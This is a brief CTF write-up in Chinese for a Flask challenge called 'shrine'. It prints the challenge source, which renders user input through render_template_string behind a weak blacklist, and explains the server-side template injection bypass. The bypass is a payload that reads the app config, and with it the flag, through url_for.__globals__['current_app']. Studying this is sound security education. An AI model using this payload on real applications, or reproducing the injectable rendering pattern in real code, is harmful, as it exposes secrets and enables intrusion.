import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read() @app.route('/shrine/')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__': app.run(debug=True)
这里用了 flask 我们就应该想到是 SSTI 模块注入
其中存在/shrine/ 目录
如何存在safe_jinjia 进行过滤 config 和self
所以平常的就无法实现
我们需要使用其他函数
例如 url_for() 或者 get_flashed_messages()
去读取全局变量 如何访问
我们要注意 这里过滤config和self是因为他们是变量 就会过滤
我们下面的payload中的是属性 所以不会过滤
我们先去看看全局变量
{{url_for.__globals__}}
存在 current_app 就是当前app 那么我们访问一下
/shrine/{{url_for.__globals__['current_app'].config}}
这里的config不会过滤 是因为是属性 所以不会过滤